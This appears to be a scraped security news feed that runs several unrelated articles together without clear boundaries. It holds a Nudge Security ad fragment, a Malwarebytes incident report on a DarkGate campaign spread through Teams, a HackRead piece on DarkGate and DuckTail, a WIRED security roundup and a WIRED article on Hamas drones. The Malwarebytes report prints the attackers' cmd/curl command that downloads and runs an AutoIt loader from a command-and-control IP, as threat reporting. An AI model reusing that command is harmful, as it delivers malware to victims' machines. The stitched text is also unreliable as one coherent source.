With Nudge Security, you can get an immediate inventory of all the AI tools your employees are using, and set up alerts to notify you whenever a new AI tool is introduced. Nudge Security automatically discovers AI tools and other SaaS applications in your environment, and categorizes them by type for easy filtering, including the free, paid, and trial accounts that you might not be able to discover by relying on procurement processes or combing through expense reports.

****2\. Assess AI tools at a glance.****

Nudge Security provides a summary view of each application to help you assess new AI tools quickly. You can see a short description of the app, find out how many accounts and integrations have been created by members of your organization, identify the original user, and check your users' security hygiene. Drilling into each tab in the menu provides even more information to support your evaluations. As you complete your reviews, you can update statuses in the "Fields" section to keep track of statuses and approvals.

****3\. Accelerate security evaluations with added context.****

For each app, Nudge Security provides additional security context that can help you evaluate new applications quickly and systematically, such as links to their terms of service and privacy policies, an overview of their breach history, and an inventory of their SaaS supply chain.

Nudge Security also alerts you to security incidents affecting the applications your employees are using so you can intervene swiftly to secure their accounts, integrations, and data.

****4\. Catch OAuth grants with overly-permissive scopes.****

The ease of agreeing to an OAuth grant can entice users to hand over more access to AI tools than they might realize.

That's why Nudge Security reveals the scopes each application has been granted and provides OAuth risk scores to help you identify risky OAuth grants quickly. The solution provide enough context to help you understand exactly what access and permissions each user has granted and what it means for your organization, so you can intervene if an application has too much access.

****5\. Reach users with guidance at the right time******Given the viral spread of AI tools, you have the best chance of changing users' behavior by reaching them immediately when they sign up for a new app.**

Nudge Security offers just-in-time interventions using automated nudges, so you can reach users immediately via email or Slack when they create a new account. As soon as a user signs up for an AI tool, you can "nudge" them to review and acknowledge your AI acceptable use policy, reaching them right when the information is most relevant and useful.

You can also nudge them toward using an alternative application that you've already determined is enterprise-ready, or prompt them to take a more secure action like setting up multi-factor authentication.

****6\. Collect usage feedback at scale to guide corporate policies.****

If your corporate-sanctioned options aren't sufficient for your users, or if you just want to keep a pulse on AI adoption at your organization, you need to understand how your employees are using these tools. Nudge Security helps you capture that information at scale, so you can make informed choices about how to manage AI adoption across your workforce. Whenever a user adds a new AI tool that you haven't seen before, you can ask them for context on what they're trying to do, which can help differentiate innocuous use cases from those that could put confidential or sensitive data at risk.

****Balancing the benefits and risks of AI tools with Nudge Security****

Your business needs AI to be competitive, which means your users need help determining which productivity tools are trustworthy and which ones could put corporate data at risk. Nudge Security is a platform for SaaS security that can help you assess new tools efficiently and nudge your users in the right direction so you can keep up with the pace of business.

Start free 14-day trial of Nudge Security

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Who's Experimenting with AI Tools in Your Organization?

Categories: Business
On September 13th, 2023, the Malwarebytes MDR team spotted a new DarkGate malware campaign on a client network.  



(Read more...)




The post Battling a new DarkGate malware campaign with Malwarebytes MDR  appeared first on Malwarebytes Labs.

First publicly reported in 2018, DarkGate is a Windows-based malware with a wide-range of capabilities including credential stealing and remote access to victim endpoints. Until recently, it was only seen being delivered through traditional email malspam campaigns. In late August 2023, however, researchers at Trusec found evidence of a campaign using external Teams messages to deliver the DarkGate Loader.

On September 13th, 2023, the Malwarebytes MDR team spotted the same campaign on a client network.

**The Initial Incident**

The threat began as a phishing attempt via Microsoft Teams. The attackers sent a malicious ZIP file named "**C\_onfidential Sign\_ificant Company Changes.zip**" (the names may vary in different iterations of the attack).

Phishing message sent to targets via Microsoft Teams in the same DarkGate campaign. Image: Truesec

A number of employees clicked on this file believing it to be legitimate. Inside this ZIP file, however, were several malicious shortcut files, or LNK files, that were disguised as PDF documents.

The names of these LNK files included "**EMPLOYEES\_AFFECTED\_BY\_TRANSITION.PDF.LNK"** and "**COMPANY\_TRANSFORMATIONS.PDF.LNK**".

**The Malicious Command**

When employees clicked on these shortcuts, it triggered a malicious command line. Its purpose? To download and run a harmful script from a remote IP address. Fortunately, Malwarebytes EDR recognized this IP as a 'Known bad' destination and blocked it.

Multiple attempts to execute processes such as curl commands

**DarkGate Loader - The Culprit**

As the MDR team delved deeper into the incident, they discovered that this was not a random attack. It was connected to a known malware attack campaign using Teams phishing to install DarkGate Loader. The use of the curl command is to fetch and deposit malicious files onto the victim's machine:

"C:\\Windows\\System32\\cmd.exe" /k curl -# -o

"C:\\Users\\\[Redacted\]\\AppData\\Local\\Temp\\Autoit3.exe" "

http://5\[.\]188\[.\]87\[.\]58:2351" -o

"C:\\Users\\\[Redacted\]AppData\\Local\\Temp\\btbgvbyy.au3"

"http://5\[.\]188\[.\]87\[.\]58:2351/msibtbgvbyy" "C:\\Users\\\[Redacted\]\\AppData\\Local\\Temp\\Autoit3.exe"

"C:\\Users\\\[Redacted\]\\AppData\\Local\\Temp\\btbgvbyy.au3" & exit

The malicious command attempts to run an AutoIt script (**btbgvbyy.au3**). Director of Threat Intelligence Jerome Segura notes the use of AutoIt, a legitimate scripting language, was already present in the very early versions of DarkGate.

Malwarebytes EDR recognizing suspicious AutoIt activity

Infected system exhibiting Indicators of Compromise (IOCs)

Recognizing the gravity of the situation, the team began collecting Indicators of Compromise (IOCs). This included hashes of the ZIP file, its contents, and samples of the malevolent script initiated by the shortcuts.

**Actions Taken**

Swift action was taken by isolating the affected machines. Although Malwarebytes EDR had already blocked the malicious IP, the MDR team took extra precautions, ensuring that no persistence mechanisms were present on the endpoints, which could have given attackers a backdoor to the system.

The MDR team also suggested blocking the download of files from external accounts in Microsoft Teams, which was the primary attack vector in this campaign.

**Lessons from the Incident**

By using a combination of evasion techniques, the threat actors behind these campaigns are able to distribute DarkGate with a minimal system footprint. If the infection had continued, the company could have faced potential data breaches, operational disruptions, financial losses, and more.

Fortunately, the collaborative efforts of Malwarebytes MDR, EDR, and the customer successfully mitigated the DarkGate malware and safeguarded the customer’s digital environment against possible reinfection.

Learn more about how Malwarebytes MDR today can help secure your organization: https://try.malwarebytes.com/mdr-consultation-new/

Get a Malwarebytes MDR quote

Read other front-line stories about how Malwarebytes MDR analysts do threat hunting on customer networks:

Tracking down a trojan: An inside look at threat hunting in a corporate network

Understanding ransomware reinfection: An MDR case study

**Indicators of Compromise (IoC)****File Details:**

Filename: C\_onfidential Sign\_ificant Company Changes.zip

Reported At: 09/13/2023 9:57:56 AM

**Network Indicators:**

C2 IP Address: 5\[.\]188\[.\]87\[.\]58

**Malicious URLs:**

http://5\[.\]188\[.\]87\[.\]58:2351

http://5\[.\]188\[.\]87\[.\]58:2351/msibtbgvbyy

Battling a new DarkGate malware campaign with Malwarebytes MDR 

By Deeba Ahmed
The cybersecurity researchers at WithSecure have identified a connection between Vietnamese DuckTail infostealer and DarkGate malware. KEY FINDINGS…
This is a post from HackRead.com Read the original post: Vietnamese DarkGate Malware Targets META Accounts in the UK, USA, India

The cybersecurity researchers at WithSecure have identified a connection between Vietnamese DuckTail infostealer and DarkGate malware.

****_KEY FINDINGS_****

*   **Vietnamese cybercrime groups are actively targeting organizations in the UK, USA, and India with various MaaS infostealers and RATs, reports WithSecure cybersecurity firm.**

*   **A connection is noticed between recent DarkGate malware attacks and the group running a campaign to hijack Meta business accounts because both attacks use the same infrastructure.**

Cybersecurity firm WithSecure, formerly F-Secure Business, has uncovered a link between the recent DarkGate malware attacks targeting its customers and Vietnam-based threat actors operating a campaign to hijack Meta business accounts and steal sensitive data.

According to WithSecure’s Detection and Response Team (DRT), multiple infection attempts with DarkGate malware were made against their clients’ organizations in the UK, USA, and India on 4 August 2023.

The lure documents, target patterns, themes, delivery methods, and overall attack tactics closely resemble the attack mechanism observed in the recent DuckTail infostealer campaigns. WithSecure has been tracking this infostealer for over a year.

DarkGate is a Remote Access Trojan (RAT) that first emerged in cyberspace in 2018. It is usually offered as a Malware-as-a-Service (MaaS) tool to cyber criminals. It is a versatile malware employed in various malicious activities such as cryptojacking, information theft, and ransomware attacks.

WithSecure researchers analyzed open-source data linked to the DarkGate malware campaign and established links to multiple infostealers. This pattern indicates that the same group or threat actor is launching these attacks. 

“By identifying characteristics of DarkGate malware lures and campaigns, we have been able to find multiple pivot points which lead to other information stealers and malware being used in very similar if not identical campaigns, and it is assessed as likely that the same threat actor group performs these campaigns” read WithSecure’s report.

The attack commenced with a file named ‘Salary and new products.8.4.zip.’ Once unwitting users downloaded and extracted it, a VBS script was activated. This script renamed and duplicated the original Windows binary (Curl.exe) to a new location, connecting to an external server to retrieve two additional files: autoit3.exe and a compiled Autoit3 script. Subsequently, the script executed the executable, de-obfuscated, and assembled the DarkGate RAT using strings within the script.

WithSecure found strong identifiers that helped the company establish links between the two campaigns. They also noted that the attackers used many different malware and infostealers, including Ducktail, Redline Stealer, and Lobshot.

“Based on what we’ve observed, it is very likely that a single actor is behind several of the campaigns we’ve been tracking that target Meta Business accounts,” stated WithSecure™ Senior Threat Intelligence Analyst Stephen Robinson in a blog post.

After obtaining control of an account, they can perform miscellaneous malicious activities, including distributing malware and conducting frauds. The lures and malicious documents used in the campaigns have similar identifiable metadata, including:

*   LNK Drive ID
*   MSI file metadata
*   Canva PDF design service account details

These distinctive markets are digital fingerprints, helping researchers link disparate campaigns to a single actor. However, many other groups could be using the same malware, which highlights the need to dig deep and find similarities in attack patterns rather than relying on malware-based analysis.

“DarkGate has been around for a long time and is being used by many groups for different purposes, not just this group or cluster in Vietnam,” Stephen Robinson, Senior Threat Intelligence Analyst at WithSecure™, explains.

Organizations must remain vigilant and employ stringent cybersecurity mechanisms to prevent DarkGate and other malware threats. It is essential to ensure up-to-date antivirus solutions, educate employees on cybersecurity best practices, use strong passwords backed by MFA (multi-factor authentication), and monitor network activity for suspicious behavior.

****_RELATED ARTICLES_****

1.  Formbook Takes the Throne as Most Prevalent Malware
2.  New Magecart Attack Uses 404 Errors to Steal Your Card Data
3.  New Windows Infostealer ‘ExelaStealer’ Being Sold on Dark Web
4.  Newly Surfaced ThirdEye Infostealer Targeting Windows Devices
5.  Fake Bitwarden Password Manager Website Drops Windows ZenRAT

Vietnamese DarkGate Malware Targets META Accounts in the UK, USA, India

Plus: IT workers secretly funnel money to North Korea, a court in the US upholds keyword search warrants, and WhatsApp gets a passwordless upgrade on Android

With the Israel-Hamas war intensifying by the day, many people are desperate for accurate information about the conflict. Getting it has proven difficult. This has been most apparent on Elon Musk’s X, formerly Twitter, where insiders say even the company’s primary fact-checking tool, Community Notes, has been a source of disinformation and is at risk of coordinated manipulation.

Case in point: An explosion at a hospital in Gaza on Tuesday was followed by a wave of mis- and disinformation around the cause. In the hours following the explosion, Hamas blamed Israel, Israel blamed militants in Gaza, mainstream media outlets repeated both sides’ claims without confirmation either way, and people posing as open source intelligence experts rushed out dubious analyses. The result was a toxic mix of information that made it harder than ever to know what’s real.

On Thursday, the United States Department of the Treasury proposed plans to treat foreign-based cryptocurrency “mixers”—services that obscure who owns which specific coins—as suspected money laundering operations, citing as justification crypto donations to Hamas and the Palestinian Islamic Jihad, a Gaza-based militant group with ties to Hamas that Israel blamed for the hospital explosion. While these types of entities do use mixers, experts say they do so far less than criminal groups linked to North Korea and Russia—likely the real targets of the Treasury’s proposed crackdown.

In Myanmar, where a military junta has been in power for two years, people who speak out against deadly air strikes on social media are being systematically doxed on pro-junta Telegram channels. Some were later tracked down and arrested.

Finally, the online ecosystem of AI-generated deepfake pornography is quickly spiraling out of control. The number of websites specializing in and hosting these faked, nonconsensual images and videos has greatly increased in recent years. With the rise of generative AI tools, creating these images is quick and dangerously easy. And finding them is trivial, researchers say. All you have to do is a quick Google or Bing search, and this invasive content is a click away.

That’s not all. Each week, we round up the security and privacy stories we didn’t cover in-depth ourselves. Click the headlines to read the full stories, and stay safe out there.

The recent theft of user data from genetics testing giant 23andMe may be more expansive than previously thought. On October 6, the company confirmed a trove of user data had been stolen from its website, including names, years of birth, and general descriptions of genetic data. The data related to hundreds of thousands of users of Chinese descent and primarily targeted Ashkenazi Jews. This week, a hacker claiming to have stolen the data posted millions of more records for sale on the platform BreachForums, TechCrunch reports. This time, the hacker claimed, the records pertained to people from the United Kingdom, including “the wealthiest people living in the US and Western Europe on this list.” A 23andMe spokesperson tells The Verge that the company is “currently reviewing the data to determine if it is legitimate.”

According to 23andMe, its systems were not breached. Instead, it said, the data theft was likely due to people reusing passwords on their 23andMe accounts that were exposed in past breaches and then used to access their accounts. If you need some motivation to stop recycling passwords, this is it.

The US Department of Justice on Wednesday said it had uncovered a vast network of IT workers who were collecting paychecks from US-based companies then sending that money to North Korea. The freelance IT workers are accused of sending millions of dollars to Pyongyang, which used the funds to help build its ballistic missile program. While the workers allegedly pretended to live and work in the US, the DOJ says they often lived in China and Russia and took steps to obscure their real identities. According to an FBI official involved in the case, it’s “more than likely” that any freelance IT worker a US company hired was part of the plot.

Searching online may have just gotten a little bit more dangerous. On Monday, a Colorado Supreme Court upheld police use of a so-called keyword search warrant. Using this type of warrant, law enforcement demands companies like Google hand over the identities of anyone who searched for specific information. This is the opposite of how traditional search warrants work, where cops identify a suspect and then use search warrants to obtain information about them.

Keyword search warrants have long been criticized as “fishing expeditions” that violate the US Constitution’s Fourth Amendment rights against unreasonable searches and seizures, because it potentially hands police information about innocent people who searched for a specific term but were not involved in any related crime.

The 23andMe User Data Leak May Be Far Worse Than Believed

Hamas has long touted its military drones, but little is known about the true scale of the threat. The answer may have consequences for people on both sides of the Israel-Gaza border.

When Hamas launched its attacks against Israel on October 7, it unleashed a flood of rockets as cover, while militants streamed through holes in the fence surrounding the Gaza strip. One particular clip released by Hamas, played on news stations the world over, provoked a particular bit of paranoia: video of balaclava-clad Hamas fighters standing in a desert landscape, launching a line of suicide drones.

Amid the terror and chaos, the video seems to underscore a long-held fear that Hamas—with the help of Iranian technology—had developed the ability to conduct air strikes on Israel. What’s more, these drones may prove more adept than Hamas’ supply of rockets at thwarting Israel’s sophisticated Iron Dome air defense system.

Hamas had been building this capacity for some time. In 2022, it touted its drone program with an ominous warning: Israel no longer had a monopoly on its skies. According to Hamas Telegram channels, roughly 40 suicide drones have been fired toward Israel since the war began earlier this month. Yet, besides some undated propaganda videos, there is scant evidence that these drones have actually been deployed against Israel—and, if they have, they don’t appear to have done much damage.

Drone warfare has dramatically altered the dynamics in a number of recent conflicts—from Ukraine to Nagorno-Karabakh to Yemen—but not in the war between Hamas and Israel.

Why? The answer could have significant implications for people on both sides of the Israel-Gaza border.

Since the early 2000s, Hamas, which was elected to lead Gaza’s government in 2006 and has held power ever since, has drastically scaled up its ability to hit targets inside Israel.

The earliest versions of its Qassam rocket were rudimentary: lightweight and capable of traveling just a few miles. In each successive generation of the missile, however, they became bigger, capable of flying farther, and equipped with larger warheads.

Over the past two decades, Hamas and Israel have engaged in a race—Hamas, to develop its offensive capabilities and extend its reach; and Israel, to frustrate those efforts as much as possible.

Like more than 20 non-state actors in conflict zones around the world, Hamas recognized that the drones could substantially upgrade its ability to wage war. Unlike its unguided missiles, which are designed to beat Israel’s air defenses simply by overwhelming them, drones are considerably harder to intercept. They fly low and don’t travel in a predictable, parabolic arch. As a number of countries have recently learned, thwarting an advancing drone—much less a number of them—is a tricky problem to solve.

Unlike Russia or Ukraine, Hamas couldn’t source military drones through an open tender. So it tapped Tunisian-born aerospace engineer Mohamed Zouari to, in the early 2010s, design Hamas’ first fleet of operational drones and stand up an industry to produce them. They called the first model Ababeel1, which was very similar to an Iranian drone and had three different models. One version was designed to conduct surveillance, one to deliver small munitions, and the third was a suicide drone.

Israel began targeting Hamas’ drone program before it even produced results, striking a production facility in 2012. But the program continued.

Around that time, there were ample signs that Hamas’ domestic production capacity had not grown as it had hoped. Small—probably commercial—drones were dispatched into Israel from Gaza in 2012 and 2013, according to reports of a talk by an Israeli air defense official. Israeli jets and anti-air systems soon began to intercept the drones over Israeli airspace. Around 2014, Hamas made headlines after claiming it had penetrated deep into Israeli airspace, flying over Tel Aviv. But analysts say, despite Hamas’ insistence, the drones were not locally made in the Gaza strip: They were likely the Ababil-1, a product of the Iranian drone program.

In 2016, Zouari was assassinated in his hometown of Sfax, Tunisia, in what has been described by Tunisian investigators as a multiyear operation. While Israel did not admit responsibility for the killing, then-defense minister Avigdor Lieberman said only that Israel “will continue to do in the best possible way what we know how to do—that is to protect our interests.” Fadi al-Batsh, who had written papers on drone technology and who Israeli media alleged was part of Hamas’ drone program, was assassinated in 2018. Lieberman suggested that al-Batsh was killed as part of a “settling of scores among terrorist organizations.” In January 2022, the Hamas-led Gaza Interior Ministry arrested a Gaza resident for al-Batsh’s death and alleged the man worked for Mossad, Israel’s intelligence agency.

As Hamas seemed to struggle to establish its own domestic drone industry, other non-state actors began showing just how devastating these unmanned aerial vehicles (UAVs) could be. The Islamic State leveraged a huge number of commercial and hobbyist drones to conduct reconnaissance and drop grenades on advancing forces. Houthi rebels in Yemen began deploying sophisticated attack drones in its fight against the state military—analysts noted that, despite claims that these drones were locally made, they bore striking similarities to Iranian attack drones.

Faced with the looming possibility that Hamas could leverage some of the same techniques, Israel began running drills, practicing with fighter jets to intercept UAVs. In February 2014, it announced a prototype of a new air defense system: The “Iron Beam”—a directed energy weapon which, it hoped, will be able to track and destroy incoming drones.

In 2021, Hamas again sounded the trumpets over its supposedly game-changing drone program. This time it unveiled a whole new model: the Shehab. The suicide drones starred in slickly made propaganda videos and have been lionized for years in Hamas communiques. Yet they proved woefully ineffective in the field. Some were intercepted by the Iron Dome (as was one Israeli reconnaissance UAV) while others were shot down by F-16 jets. Video footage and unverified claims from Hamas suggest that one drone may have exploded near an Israeli chemical plant in May 2014—but appeared to do little to no damage.

Despite the program’s Iranian influence, Hamas claimed some of its drones were “locally made.” It said in a May 2022 press release that its drone program had made major progress, and it touted these new drones as a “turning point” for its fight against Israel. In September 2022, Hamas inaugurated “Shehab Square,” a public square featuring a model of the suicide drone on a pillar.

Despite all this fanfare, a December 2022 report from the International Center for Counter-Terrorism (ICCT) took a dim view of Hamas’ drone program. “Hamas has not demonstrated any ability to regularly use drones successfully,” the researchers wrote. As to why Hamas would continue investing in a capability that has such a poor record, the ICCT surmised that “the association of drone technology with military status may explain the group’s continued employment of drones.”

What’s more, the ICCT noted that Hamas’ technical failures seemed to be compounded by a lack of strategy or plan for what to do with these drones. The paper suggested that Hamas may lack the technical know-how to use these drones effectively, that it may be ineffective against Israel’s defenses, or possibly that “the group is more concerned about being seen using drones than using them effectively.”

“I think it’s surprising that Hamas didn’t use more commercial and tactical drones in its invasion,” Paul Lushenko wrote on Twitter in the hours after Hamas’ October 7 assault on Israel. “For all the concern of an Israeli intelligence failure, I think the lack of Hamas’ use of drones suggests poor organizational learning.”

Lushenko is a faculty professor at the United States Army War College and an expert in the emerging field of drone warfare. Speaking with WIRED, Lushenko says there’s little sign that Hamas, despite their usual bragging, actually managed to put its drone program into action. “We haven’t seen the evidence.”

Certainly, Hamas made some targeted use of several over-the-counter drones and quadcopters—similar to how the Islamic State deployed the UAVs during its brief control of a proclaimed caliphate. Videos reportedly released by Hamas purportedly showed drones dropping explosive devices on Israeli communications towers and machine gun positions near the Gaza border. These UAVs pose a particular challenge because they are often too small and too nimble to be successfully intercepted. Instead, Israel says it is stepping up jamming efforts to break the link between those drones and their controllers within Gaza.

Beyond those short-range and lightweight UAVs, however, Hamas’ use of its homemade, Iranian-inspired suicide drones seems to be not much more than bluster.

The much-broadcast Hamas propaganda video of its fixed-wing UAVs being fired does not, in fact, show part of the assault on Israel. It was filmed before the attack—the full video shows the suicide drones crashing into a fake Israeli outpost—the explosion knocking over cardboard cutouts, as a blue-and-white Israeli flag flaps nearby.

Hamas Telegram channels have claimed repeatedly in recent weeks that their drones struck positions in Israel but offered little in the way of visual evidence or specifics. One supposed strike was conducted on “a parking lot for vehicles and personnel east of Gaza.” There has been no confirmation of any of these strikes or claims of any damage inflicted.

The Israel Defense Forces declined WIRED’s request to comment on whether it had intercepted any of these drones, writing that “the IDF is currently focused on eliminating the threat from the terrorist organization Hamas.”

There may be two possible explanations for this apparent lack of impact. One is that Hamas has opted to stockpile these drones, saving them for an anticipated Israeli ground operation. The other is that, like past attempts, Hamas’ drone program has simply failed to launch.

The first possibility could pose an enormous challenge for Israel. As we’ve seen on both sides of the Ukraine-Russia war, drones have substantially changed the reality on the ground. While analysts say Russia has used Iranian-made kamikaze drones to attack Ukrainian critical infrastructure, Ukraine has responded with Turkish-made Bayraktar TB2 drones to hammer Russian convoys and defensive positions. Smaller quadcopters have given both sides unparalleled visibility behind enemy lines and have proved remarkably deadly in urban warfare. If Hamas is sitting on a reserve of these drones, to be used if Israeli forces cross into Gaza—where they will not have the protection of the Iron Dome—it could be highly effective at frustrating a possible ground assault.

“It's not uncommon for non-states \[actors\] and states to not use all of their decisive weapons all at once,” James Patton Rogers, executive director of the Cornell Brooks Tech Policy Institute, tells WIRED. “Will this be something that happens in the coming days and weeks? Is this something that was deliberately held back en masse from being launched against Israel?”

The fact that Hamas has, on dozens of occasions over the past two years, fired these drones toward Israel with little to no effect suggests that its reach may have extended its grasp. “We don't know the full impact of those yet, if there wasn't much impact,” Rogers says. “Did they do anything more than the rockets or the mortars would do? Were they able to penetrate the Iron Dome more than a mortar or a rocket?”

Normally, these loitering munitions are more effective at beating missile defense systems, as they tend to fly low and slow, hugging the ground. But given that Israel has one of the most advanced air-defense systems in the world, Hamas may simply not have had the time, capacity, or skill to adequately learn how to overcome the Iron Dome.

“I do think it's a bit too early to tell in this one,” Rogers says.

Lushenko adds that, even if these drones do very little physical damage, the threat they pose will still loom large. “They really have a psychological effect.”

Tag

#intel